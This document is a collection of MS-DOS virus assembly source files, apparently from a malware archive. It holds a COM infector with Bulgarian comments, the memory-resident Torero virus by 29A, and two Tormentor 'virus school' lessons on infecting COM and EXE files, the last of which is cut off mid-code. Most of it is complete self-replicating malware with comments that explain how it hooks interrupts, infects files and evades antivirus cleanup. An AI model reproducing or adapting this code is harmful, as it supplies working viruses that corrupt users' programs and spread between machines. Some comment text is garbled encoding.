; ±®¡±²¢¥­  ¯°®¶¥¤³°  §  ®¡° ¡®²ª  ­  ª°¨²¨·­¨ £°¥¸ª¨ (¢¥ª²®° 24h) ¨ ­¥ ¯°®¬¥­¿;
; ¤ ² ²  ¨ · ±  ­  § °¿§ ­¨²¥ ´ ©«®¢¥. ;
; Tony-F ­ ¬¨°  ®°¨£¨­ «­¨¿  ¤°¥± ­  ¢¥ª²®° 21h ¨ £® ¯®±² ¢¿ ¢ ² ¡«¨¶ ²  ­  ;
; ¯°¥ªº±¢ ­¨¿²  ª ²® ¢¥ª²®° 3, ² §¨ ®¯¥° ¶¨¿ ¯°¥·¨ ­  ¥¢¥­²³ «­® ²° ±¨° ­¥ ­  ;
; ¢¨°³±  ± ¤¥¡³£¥°. ;
;------------------------------------------------------------------------------;
;  ±¥¬¡«¨° ©²¥ ± Turbo Assembler 2.0+
.model Tiny
.code
VirLen = offset EndCode - offset Start ; „º«¦¨­  ­  ¢¨°³± .
;-----------------------------------------------------------------------------;
Org 07Fh
INT24 db ? ; ’³ª ¹¥ ¡º¤¥ ­ ±®·¥­ ¢¥ª²®° 24h.
Org 0100h
NewDTA db 15h dup (?) ; ‘²°³ª²³°  ­  DTA.
FAttr db ?
FTime dw ?
FDate dw ?
FLen dw ?, ?
FName db 0Dh dup (?)
;-----------------------------------------------------------------------------;
Org 100h
Start:
push ax ; ‡ ¯ §¢  ±º¤º°¦ ­¨¥²® ­  AX.
;...... ’³ª § ¯®·¢  ²º°±¥­¥²® ­  ®°¨£¨­ «­¨¿ ¢¥ª²®° 21h ¢ ±¥£¬¥­²  ­  „Ž‘
mov ax,1203h
int 2Fh ; <20>°®·¨²  ±¥ ±¥£¬¥­²  ­  „Ž‘.
xor si,si ; Ž°¨£¨­ «­¨¿ ¢¥ª²®° ±¥ ²º°±¨ ¯® ¯º°¢¨²¥
Again: ; ²°¨ ¡ ©²  - 2…h,3€h ¨ 26h.
lodsw
cmp ax,3A2Eh
je NextByte
dec si
jnz Again
jmp Done
NextByte:
lodsb
cmp al,26h
jne Again
Found:
sub si,03
mov dx,si
mov ax,2503H ; ¢¥ª²®° 21h ±¥ ¯®±² ¢¿ ­  ¬¿±²®²® ­ 
Int 21h ; ¢¥ª²®° 3.
push cs ; ¢º§±² ­®¢¿¢  ±¥ ±²®©­®±²²  ­  DS.
pop ds
;...... <20>°¥­ ±®·¢ ­¥ ­  ¢¥ª²®°  §  ª°¨²¨·­¨ £°¥¸ª¨
mov INT24,0CFh ; ‘º§¤ ¢  ­®¢ ¢¥ª²®° 24h - Iret
mov ax,2524h
mov dx,offset INT24
Int 3 ; <20>°¥­ ±®·¢  ¢¥ª²®°  24h.
mov ax,cs
add ah,10h
mov es,ax ; ES = CS + 64 KBytes
mov si,offset Start
xor di,di
mov cx,si ; <20>°¥µ¢º°«¿ ª®¤  ­  ¢¨°³±  64KBytes
rep movsb ; ¯®-­ £®°¥ ¢ ¯ ¬¥²² .
mov dx,offset NewDTA ; <20>®±² ¢¿ DTA ­  ­®¢  ¤°¥±.
mov ah,1Ah
Int 3
mov ah,2Ah
Int 3 ; ˆ±ª  ®² „Ž‘ ¤ ² ² ,
add dl,'A' ; ¨ ®² ­¥¿ ±¥ ¯®«³· ¢  ¯º°¢ ²  ¡³ª¢ 
mov AllCom ,dl ; ­  ´ ©«®¢¥²¥ §  § ° §¿¢ ­¥.
;...... ‡ ¯®·¢  ²º°±¥­¥ ­  ´ ©«®¢¥ §  § ° §¿¢ ­¥.
mov dx, offset AllCom ; ’º°±¨ ¢±¨·ª¨ '?*.COM' ´ ©«®¢¥.
mov cl,110B
mov ah,4Eh ; ˆ§¢¨ª¢  Find First.
Int 3
jc Done ; <20>°®¤º«¦ ¢  ­ ² ²ºª ¯°¨ «¨¯±  ­ 
; ´ ©«®¢¥ §  § ° §¿¢ ­¥.
FindNext:
mov dx,offset Fname ; dx  ¤°¥±  ­  ¨¬¥²® ­  ´ ©«  ®² DTA.
mov ax,3D02h ; Ž²¢ °¿ ´ ©«  §  § ¯¨±/·¥²¥­¥.
Int 3
mov bx,ax ; ‡ ¯ §¢  ­®¬¥°  ­  ®²¢®°¥­¨¿ ´ ©«.
push ds ; ‡ ¯ §¢  DS.
push es
pop ds ; DS = CS + 64 KBytes.
mov dx,VirLen ; DX = ¤º«¦¨­ ²  ­  ¢¨°³±  .
mov cx,-1 ; <20>°®·¨²  ±¥ ¶¥«¨¿ ´ ©« ­   ¤°¥± - DS:DX .
mov ah,3Fh ; ’ ¬ ±¥ ­ ¬¨°  ¢¨°³± ,  ±¥£  ±«¥¤ ­¥£®
Int 3 ; ¨ ´ ©«º².
; “¢¥«¨· ¢  ¤º«¦¨­ ²  ­  ´ ©« (AX) ±
add ax,Virlen ; ¤º«¦¨­ ²  ­  ¢¨°³± .
jc Close ; <20>°¨ ¯°¥¯º«¢ ­¥ ´ ©«º² ­¥ ±¥ § ° §¿¢ .
cmp Byte ptr ds:[ Mark + VirLen -100h ],'T' ; „ «¨ ´ ©«º² ¥ § ° §¥­ ¢¥·¥ ?
je Close
push ax ; ‡ ¯ §¢  ¤º«¦¨­ ²  ­  ´ ©«  ¢ ±²¥ª .
xor cx,cx
xor dx,dx
mov ax,4200h ; <20>°¥¬¥±²¢  ±¥ ³ª § ²¥«¿ ­  ´ ©« (CX:DX)
Int 3 ; ¢ ­ · «®²® ¬³.
pop cx ; <20>°®·¨²  ¤º«¦¨­ ²  ­  ´ ©«  ®² ±²¥ª .
; DX ¥ ° ¢­® ­  0 ®² Fn 42.
mov ah,40h ; Ž²  ¤°¥±  DS:DX ±¥ § ¯¨±¢  ­  ¤¨±ª 
Int 3 ; ¢¨°³± + ´ ©«.
mov cx,cs:FTime
mov dx,cs:FDate ; ‚º§±² ­®¢¿¢ ² ±¥ ¤ ² ²  ¨ ¢°¥¬¥²® ­ 
mov ax,5701h ; § ° §¿¢ ­¨¿ ´ ©« ®² DTA.
Int 3
Close:
pop ds ; ‚º§±² ­®¢¿¢  DS.
mov ah,3Eh ; ‡ ²¢ °¿ ´ ©« .
Int 3
mov ah,4Fh
Int 3 ; ˆ§¢¨ª¢  Find Next,
jnc FindNext ;  ª® ¨¬  ®¹¥ ´ ©«®¢¥ ¢±¨·ª® ±¥ ¯®¢² °¿
; ¨ §  ²¿µ.
;....... <20> · «® ­  ±² °²¨° ­¥ ­  ¯°®£° ¬ ²  ªº¬ ª®¿²® ¥ § ª ·¥­ ¢¨°³± .
Done:
mov dx,80h
mov ah,1Ah
Int 3 ; ‚º§±² ­®¢¿¢  ±¥ ±² °¨¿  ¤°¥± ­  DTA.
push es
mov ax,offset TransF -100h ; <20>°¥¤ ¢  ³¯° ¢«¥­¨¥²® ­  ¢¨°³± 
push ax ; ª®©²® ¥ 64 KBytes ¯®-­ £®°¥
RETF ; ®² ¥²¨ª¥² TransF.
;........................................
; Œ °ª¨°®¢ª  §  ° §¯®§­ ¢ ­¥ ­  § ° §¥­¨
Mark db 'Tony' ; ´ ©«®¢¥.
AllCom db '+' ;
db '*.COM',0 ; Œ ±ª  §  ²º°±¥­¥ ­  ¢±¨·ª¨ ´ ©«®¢¥
;.......................................; §  § ° §¿¢ ­¥.
TRansF:
push ds
pop es
pop ax ; ‚º§±² ­®¢¿¢  ±º¤º°¦ ­¨¥²® ­  AX.
mov si,offset EndCode ; ‘¬ºª¢  ª®¤  ­  ¯°®£° ¬ ²  § ¯®·¢ ¹
mov di,offset Start ; ­¥¯®±°¥¤±²¢¥­® ±«¥¤ ¢¨°³±  ± 100h ¡ ©²  ­ ¤®«³.
push ds ; <20>®¤£®²¢¿  ¤°¥±  ¢ ±²¥ª  §  ¯°¥µ®¤ 
push di ; ªº¬ ­ · «®²® ­  ®°¨£¨­ «­ ²  ¯°®£° ¬ .
mov cx,0FFF0h -102h -Virlen
rep movsb
RETF
;-----------------------------------------------------------------------------;
EndCode:
Ret ; Ž² ²³ª § ¯®·¢  § ° §¥­ ²  ¯°®£° ¬ 
;-----------------------------------------------------------------------------;
End Start


570
MSDOS/Virus.MSDOS.Unknown.torero.asm Normal file
View File

@ -0,0 +1,570 @@
;
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
; Torero ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
; by Mister Sandman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
;
; Hoho... here you have a new coolio viral technique, especially dedicated
; to those who think that everything on viruses was invented yet :) This
; virus ain't a 'powerful' one; in fact, and as i decided to do in this
; first issue as i hadn't many time, it's a simple infector just written
; to show this new viral capability, never used before as far as i know.
;
; And what is this technique about?, you might ask. Ok... apart from DirII
; and all its family, we don't know many viruses that store the original
; header of infected files in other place than the viral code, right?
;
; AVV and i were making some researches and suddenly found ten free unused
; bytes on the directory entry of each file... and this the place where my
; virus stores the header of every file it infects :) In this way, the AV
; companies must write some specific routines for disinfecting Torero...
; this means that the cleaning of our virus is more difficult, which is
; what we're looking for :)
;
; Anyway, as every viral technique, it has some pros and some cons... and
; the cons consist on the next simple thingy: if someone copies, compress-
; es, or manipulates an infected file, it will have a different directory
; entry, and then it will be imposible to restore its original header.
;
; However, and as this is just a sample virus, i didn't pay much attention
; to this kinda probabilities, and i just used an idea Wintermute gave me:
; if the host doesn't find its original header, it will display a message
; i'm sure you all know: 'This program requires Microsoft Windows.' :)
;
; As a last (but not least) feature in this virus, don't forget to have a
; look at the infection mark, based on using the eigth attribute bit, al-
; ways empty and unused until now. This is a specially good infection mark
; for a virus, as it's very simple and doesn't get flagged because of in-
; correct time stamp and all that shit. Besides, it makes things easier
; for us when implementing stealth techniques, etc.
;
; About the name, i decided to call it 'Torero' because it's a spanish
; word which means 'bullfighter', often used for telling someone that he
; or what he did is cool, because toreros are supposed to have the biggest
; nuts around :)
;
; Compiling instructions
;
; tasm /m torero.asm
; tlink torero.obj
; exe2bin torero.exe torero.com
.286
torero segment byte public
assume cs:torero,ds:torero
org 0
torero_start label byte
torero_size equ torero_end-torero_start
torero_entry: call delta_offset ; Get ë-offset in BP
delta_offset: pop bp ; for l8r use
sub bp,offset delta_offset
mov ah,30h ; Get DOS version
int 21h
cmp bx,';)' ; Are we already
jne set_int_21h ; memory resident?
push cs ; Save CS for the host
mov bx,ds ; Don't lose DS
xor ax,ax ; Jump to the memory
mov ds,ax ; copy and restore
push word ptr ds:[21h*4+2] ; the host header
push offset check_host
mov ds,bx
retf
set_int_21h: mov ax,es
dec ax
mov ds,ax ; Program's MCB segment
xor di,di
cmp byte ptr ds:[di],'Y' ; Is it a Z block?
jna set_int_21h
sub word ptr ds:[di+3],((torero_size/10h)+2)
sub word ptr ds:[di+12h],((torero_size/10h)+2)
add ax,word ptr ds:[di+3]
inc ax
mov ds,ax
mov byte ptr ds:[di],'Z' ; Mark block as Z
mov word ptr ds:[di+1],8 ; System memory
mov word ptr ds:[di+3],((torero_size/10h)+1)
mov word ptr ds:[di+8],4f44h ; Mark block as owned
mov word ptr ds:[di+0ah],0053h ; by DOS (444f53h,0)
inc ax
cld
push cs
pop ds
mov es,ax
mov cx,torero_size ; Copy virus to memory
mov si,bp
rep movsb
push es
push offset copy_vector ; Jump to the virus
retf ; copy in memory
copy_vector: push ds
mov ds,cx
mov es,ax ; Save int 21h's
mov si,21h*4 ; original vector
lea di,old_int_21h
movsw
movsw
mov word ptr [si-4],offset new_int_21h
mov word ptr [si-2],ax ; Set ours
mov si,13h*4 ; Save int 13h's
lea di,old_int_13h ; original vector
movsw
movsw
mov word ptr [si-4],offset new_int_13h
mov word ptr [si-2],ax ; Set ours
mov ds,ax
check_host: call open_host ; Open the host
call get_sft ; Get its SFT for our
call check_mark ; infection mark
jb messed_up ; File is messed up :-(
call read_entry ; Read the entry
call point_entry ; Point to the header
cmp word ptr ds:[si],0 ; Is it empty?
jne restore_header
cmp word ptr ds:[si+2],0 ; Empty too? huh :-(
je messed_up ; File is messed up
restore_header: pop es ; ES=host segment
push es ; Store it in the stack
mov di,100h ; file header from the
push di ; Store the IP
movsw ; DS:SI points to the
movsb ; original header, in
; the directory entry
push es
pop ds ; DS=ES
retf ; Jump to the host
messed_up: mov ah,3eh ; File is messed up...
int 21h ; close it and show
call emergency ; the Windows message :)
; ÄÄ´ Torero's int 13h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
new_int_13h: cmp ah,3
je sector_write ; Sector write?
db 0eah ; Jump back to the
old_int_13h dw ?,? ; original int 13h
sector_write: push ax bx cx
pushf
xor ah,ah ; Calculate how many
mov cl,4 ; files we must test
shl ax,cl ; by multiplying the
mov cx,ax ; sector number with
or cx,cx ; 10h (entries)
je bucle_end
int_13h_bucle: cmp byte ptr es:[bx+9],'O' ; -O-?
jne more_files
mov al,byte ptr es:[bx+9]
sub al,2
cmp al,byte ptr es:[bx+0ah] ; -OM?
jne more_files
cmp al,'M' ; Then it's a COM
je subtract
more_files: add bx,20h ; Look for more files
loop int_13h_bucle ; Look'n'loop :)
bucle_end: popf
pop cx bx ax ; End of the bucle
; Call the original
call int_13h ; int 13h and jump
xor_and_jump: xor ax,ax ; to the original int
return_to_int: push bp ax
pushf
pop ax ; Return to the
mov bp,sp ; original int 13h
mov word ptr ss:[bp+8],ax
pop ax bp
retf 2
subtract: cmp byte ptr es:[bx],0e5h ; A deleted file...
je more_files ; bah, skip it
cmp byte ptr es:[bx+0bh],80h ; Infected?
jb more_files
cmp word ptr es:[bx+0ch],0 ; Is the header field
jne more_files ; empty?
cmp word ptr es:[bx+0eh],0
jne more_files
mov ax,word ptr cs:[header_store] ; Ok, let's copy
mov word ptr es:[bx+0ch],ax ; the original file
; header to the
mov ax,word ptr cs:[header_store+2] ; directory entry
mov word ptr es:[bx+0eh],ax
jmp more_files
; ÄÄ´ Torero's signature ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
signature db 0dh,0ah,'[Torero €:-) by Mister Sandman/29A]',0dh,0ah
; ÄÄ´ Torero's int 21h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
new_int_21h: cli
cmp ah,6ch ; This code is stolen
ja real_checks ; from the original
; DOS kernel handler,
cmp ah,33h ; so they won't catch
jb real_checks ; us if they don't go
jz fake_stuff ; further thru the
; rest of the code of
cmp ah,64h ; the handler... thanx
ja fake_stuff ; to Qark for this
jz real_checks ; cool idea :)
cmp ah,51h
jz real_checks
cmp ah,62h
jz fake_stuff
cmp ah,50h
jz real_checks
fake_stuff: push ax bx cx ; Shit, shit, shit,
nop ; shit... skip it
pop cx bx ax
real_checks: cmp ah,30h
jne opening ; (get DOS version)?
mov bx,';)' ; Return the smiley :)
iret
opening: cmp ah,3dh ; File opening?
je file_open
cmp ax,4301h ; Attribute change?
je new_attribute
cmp ax,6c00h ; Extended open?
je file_open
jmp_int_21h db 0eah ; Jump to the original
old_int_21h dw ?,? ; int 21h address
; ÄÄ´ File open ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
file_open: call infect_file ; Infection routine
jmp dword ptr cs:[old_int_21h] ; Jump back to int 21h
; ÄÄ´ New attribute ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
new_attribute: mov ah,30h ; Change 43h for 30h
iret ; so it will do nothing
; ÄÄ´ Infection routine ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
infect_file: pushf
push ax bx cx dx ; Push registers, flags
push si di ds es ; and all that shit
call set_int_24h ; Set int 24h
cmp ah,6ch ; Extended open?
jne normal_open
mov dx,si ; Fix it to DS:DX
normal_open: mov ax,3d00h ; Open the file
call int_21h
xchg bx,ax ; File handle in BX
push cs ; CS=DS
pop ds
call get_sft ; Get file's SFT
call check_mark ; Already infected?
jae close_and_pop
mov byte ptr es:[di+2],2 ; Open mode=r/w
mov ax,word ptr es:[di+28h] ; Check the extension
cmp ax,'OC' ; of our victim
jne close_and_pop
mov byte ptr cs:[infecting],1
mov ah,3fh ; Read the first three
mov cx,3 ; bytes to our temporal
lea dx,header_store ; header store
call int_21h
mov ax,word ptr es:[di+11h] ; File lenght in AX
cmp ax,0ea60h ; Too big file?
ja close_and_pop
push ax ; Lseek to the end of
call lseek_end ; the file
mov ah,40h ; Append our k-r4d
mov cx,torero_size ; code :)
lea dx,torero_start
call int_21h
pop ax ; Make the jmp to
sub ax,3 ; our virus body
mov word ptr cs:[com_header+1],ax ; for the new file
call set_marker
call lseek_start ; Lseek to the start
mov ah,40h ; Write the new header
mov cx,3 ; in so we'll be always
lea dx,com_header ; executed first ;P
call int_21h
mov ax,word ptr es:[di+11h] ; Actual size in AX
sub ax,3 ; Lseek to the position
call lseek_end ; of the original header
mov ah,40h ; Destroy all the info,
mov cx,3 ; already stored in the
lea dx,garbage ; directory entry };)
call int_21h
close_and_pop: mov ah,3eh ; Close the file
call int_21h
call reset_int_24h ; Reset int 24h
pop es ds di si ; And pop out all the
pop dx cx bx ax ; shit we pushed b4
popf
ret
; ÄÄ´ Call to the original int 13h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
int_13h: pushf
call dword ptr cs:[old_int_13h] ; Call the original
ret ; int 13h
; ÄÄ´ Call to the original int 21h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
int_21h: pushf
call dword ptr cs:[old_int_21h] ; Call the original
ret ; int 21h
; ÄÄ´ Get SFT in ES:DI ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
get_sft: push ax bx
mov ax,1220h ; Get job file table
int 2fh ; in ES:DI (DOS 3+)
jc bad_sft
xor bx,bx ; Get the address of
mov ax,1216h ; the specific SFT for
mov bl,byte ptr es:[di] ; our handle
int 2fh
bad_sft: pop bx ax ; Pop registers and
ret ; return to the code
; ÄÄ´ Check our infection mark ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
check_mark: cmp byte ptr es:[di+4],80h ; Compare with the min.
ret ; value of our mark
; ÄÄ´ Read the directory entry ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
read_entry: push ax bx cx
call parameters ; Load the sector
int 25h
pop cx cx bx ax
ret
; ÄÄ´ Sector loading ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
parameters: mov ax,word ptr es:[di+1bh] ; Load the sector
mov word ptr cs:[control_block],ax ; number in our
mov ax,word ptr es:[di+1dh] ; control block
mov word ptr cs:[control_block+2],ax ; Read a long
mov cx,0ffffh ; sector, 4 bytes
push cs ; CS=DS
pop ds
mov word ptr cs:[control_block+4],1 ; One sector
mov word ptr cs:[control_block+6],offset sector
mov word ptr cs:[control_block+8],cs
lea bx,control_block ; Control block
push ds si
lds si,dword ptr es:[di+7] ; Point to the
lodsb ; DPB
pop si ds
ret
; ÄÄ´ Point to the original header ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
point_entry: mov al,byte ptr es:[di+1fh] ; Guess the entry
xor ah,ah
push cx
mov cl,5 ; Multiply it*20h
shl ax,cl
pop cx
lea si,sector ; Calculate its offset
add si,ax ; into the sector and
add si,0ch ; move to si+0ch (header)
ret
; ÄÄ´ Set int 24h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
set_int_24h: push ax si di
push ds es
xor ax,ax ; Point to the IVT
mov ds,ax
push cs ; CS=ES
pop es
mov si,24h*4 ; Save the original int
mov di,offset old_int_24h ; 24h address and set
cld ; ours l8r
movsw
movsw
mov word ptr [si-4],offset new_int_24h
mov word ptr [si-2],cs
pop es ds
pop di si ax
ret
; ÄÄ´ Restore int 24h ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
reset_int_24h: push ax si di
push ds es
xor ax,ax ; Point to the IVT
mov es,ax
push cs ; CS=DS
pop ds
mov si,offset old_int_24h ; Restore the original
mov di,24h*4 ; int 24h address
cld
movsw
movsw
pop es ds
pop di si ax
ret
; ÄÄ´ Torero's int 24h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
new_int_24h: mov al,3 ; Pass the error code
iret
old_int_24h: dw ?,? ; Original int 24h
; ÄÄ´ Set our infection mark ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
set_marker: mov byte ptr es:[di+4],80h ; Attribute bit 8
ret
; ÄÄ´ Lseek to the start of the file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
lseek_start: mov word ptr es:[di+15h],0 ; Read pointer=0
ret
; ÄÄ´ Lseek to the end of the file ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
lseek_end: mov word ptr es:[di+15h],ax ; Read pointer=file
ret ; length (EOF)
; ÄÄ´ Open the host we're being executed from ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
open_host: mov ah,62h ; Get PSP address
int 21h
push es
mov ds,bx
mov bx,word ptr ds:[2ch] ; DS:2ch=PSP segment
mov es,bx
xor di,di
mov al,1 ; Look for 01h (the
mov cx,0ffffh ; mark which sepparates
repnz scasb ; the path from the
jnz emergency ; name of the file that
; is being executed)
xor al,al
scasb
push es
pop ds es
mov ah,3dh ; Open the host
mov dx,di
call int_21h
xchg bx,ax ; Pass handle to BX
ret ; and return
; ÄÄ´ Emergency routine... data lost! ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
emergency: push cs ; CS=DS
pop ds
mov ah,9 ; Show the message...
lea dx,windows ; This programs requires
int 21h ; Microsoft Windows
mov ax,4c01h ; Errorlevel=01 :)
int 21h
; ÄÄ´ Data area ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
sector db 200h dup (?) ; The long sector
control_block dd ? ; Control block
dw ?
garbage dd ?
db ';)'
windows db 'This program requires Microsoft Windows.'
db 0dh,0ah,'$'
action db ? ; Reading or writing?
infecting db ?
com_header db 0e9h,?,? ; The COM header
header_store db 3 dup (?) ; Temporal header store
torero_end label byte
torero ends
end torero_start

158
MSDOS/Virus.MSDOS.Unknown.torm-205.asm Normal file
View File

@ -0,0 +1,158 @@
;
; Virus school, lession 1 (c) 1992 Tormentor [Demoralized Youth]
;
; This is the first lession on how to make an own virus.
; Hope you'll learn something of it...
; To be compiled with TASM 3.0 or higher.
;
; This virus is quite dumb and 'noisy'
; It updates the filedate and time, changes DTA before execution causing
; some progs to belive they are executed with parameters...
; But this should only be a 'raw' virus that you can develop.
; Certain program may hang, so i recommend you not to spread to geeks
; since there is MANY better viruses to use for such nice purpose.
;
; If you want to conntact me or other virus-writers call me on my board:
; Swedish Virus Laboratory +46-3191-9393
;
; Greetings to All virus-writers!
;
.model tiny
.radix 16
.code
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
org 100
dummy_code: db 'M' ; Mark file as infected.
db 3 DUP(90) ; This is to simulate a infected prog.
; Not included in virus-code.
Virus_Start: call where_we_are ; Now we call the next bytes, just to
; know what address virus lies on.
where_we_are: pop si ; Since the virus-code's address will
; differ from victim to victim.
; a POP SI after a call will give us the
; address which equals to 'where_we_are'
; Very important.
;-----------------------------------------------------------------------
; Now we have to put back the original 4 bytes in the host program, so
; we can return control to it later:
add si,_4first_bytes-where_we_are
mov di,100
cld
movsw
movsw
;------------------------------------------------------------------------
; We have to use SI as a reference since files differ in size thus making
; virus to be located at different addresses.
sub si,_4first_bytes-Virus_Start+4
;------------------------------------------------------------------------
; Now we just have to find victims, we will look for ALL .COM files in
; the current directory.
mov ah,4e ; We start to look for a *.COM file
look4victim: mov dx,offset file_match-Virus_Start
add dx,si
int 21
jc no_victim_found ; If no *.COM files was found.
mov ax,3d02 ; Now we open the file.
mov dx,9e ; The found victims name is at ds:009e
int 21 ; in DTA.
jc cant_open_file ; If file couldn't be open.
xchg ax,bx ; Save filehandle in bx
; (we could use MOV BX,AX but we saves one byte by using xchg )
mov ah,3f ; Now we read the first 4 bytes
mov cx,4 ; from the victim -> buffer
mov dx,offset _4first_bytes-Virus_Start
add dx,si
; We will then overwrite them with
int 21 ; a JMP XXXX to virus-code at end.
jc read_error
cmp byte ptr ds:[si+_4first_bytes-Virus_Start],'M'
jz sick_or_EXE ; Check if infected OR *.EXE
; Almost all EXE files starts with 'M' and we mark the infected files by
; starting with 'M' which equals to DEC BP
; Now we just have to have one check instead of 2 (infected and *.EXE)
mov ax,4202 ; Position file-pointer to point at
xor cx,cx ; End-of-File.
xor dx,dx ; Any writing to file will now APPEND it
int 21 ; Returns AX -> at end.
sub ax,4 ; Just for the JMP structure.
mov word ptr ds:[_4new_bytes+2],ax
; Build new JMP XXXX to virus.
; ( logic: JMP AX )
mov ah,40 ; Append file with virus code.
mov cx,offset Virus_Lenght
; File-size will increase with
mov dx,si ; Virus_Lenght.
int 21
jc write_error
mov ax,4200 ; Position file-pointer to begin of file
xor cx,cx ; So we can change the first 3 bytes
xor dx,dx ; to JMP to virus.
int 21
mov ah,40 ; Write new 3 bytes.
mov cx,4 ; After this, executing the file will
mov dx,offset _4new_bytes-Virus_Start
add dx,si
; result in virus-code executing before
int 21 ; original code.
; (And more files will be infected)
jc write_error
mov ah,3e ; Close file, now file is infected.
int 21 ; Dos function 3E (close handle)
Sick_or_EXE: mov ah,4f ; Well, file is infected. Now let's
jmp look4victim ; find another victim...
write_error: ; Here you can test whats went wrong.
read_error: ; This is just for debugging purpose.
cant_open_file: ; These entries are equal to eachother
no_victim_found: ; but could be changed if you need to test something.
mov ax,100 ; Every thing is put back in memory,
push ax ; lets us RET back to start of program
ret ; and execute the original program.
notes db ' (c) 1992 Tormentor ,Swedish Virus Laboratory'
db ' / Demoralized Youth / '
file_match db '*.COM',0 ; Pattern to search for.
; Don't forget to end with 0 !
_4first_bytes: ret ; Here we save the 4 first org. bytes
db 3 DUP(0)
; We have a ret here since this file isn't a REAL infection.
_4new_bytes db 'M',0E9, 00, 00 ; Here we build the 4 new org. bytes
; so our virus-code will be run first.
Virus_End EQU $
end dummy_code

160
MSDOS/Virus.MSDOS.Unknown.torm-358.asm Normal file
View File

@ -0,0 +1,160 @@
;
; Virus Lession #2 'How to make a non-resident EXE infector'
;
; (c) 1992 Tormentor // Demoralized Youth
;
; Well, I had not time to comment this code as much as I wanted to,
; but here you are.
; What can be hard to understand is the .EXE header changes, but if
; you look at the description on the header (ex: Norton guide Tech. Ref)
; you'll understand...
; Anyway, feel free to use this example and if you have any questions
; or anything call my board: Swedish Virus Labratory +46-3191-9393
;
; Greetings to all virus-writers!
;
; /Tormentor
;
.model tiny
.radix 16
.code
Virus_Lenght EQU Virus_End-Virus_Start ; Lenght of virus.
org 100
Virus_Start: call where_we_are
where_we_are: pop si
sub si,where_we_are-Virus_Start
mov ax,es
add ax,10
add ax,cs:[si+Exe_header-Virus_Start+16]
push ax
push cs:[si+Exe_header-Virus_Start+14]
push ds
push cs
pop ds
mov ah,1a
mov dx,offset Own_dta-Virus_Start
add dx,si
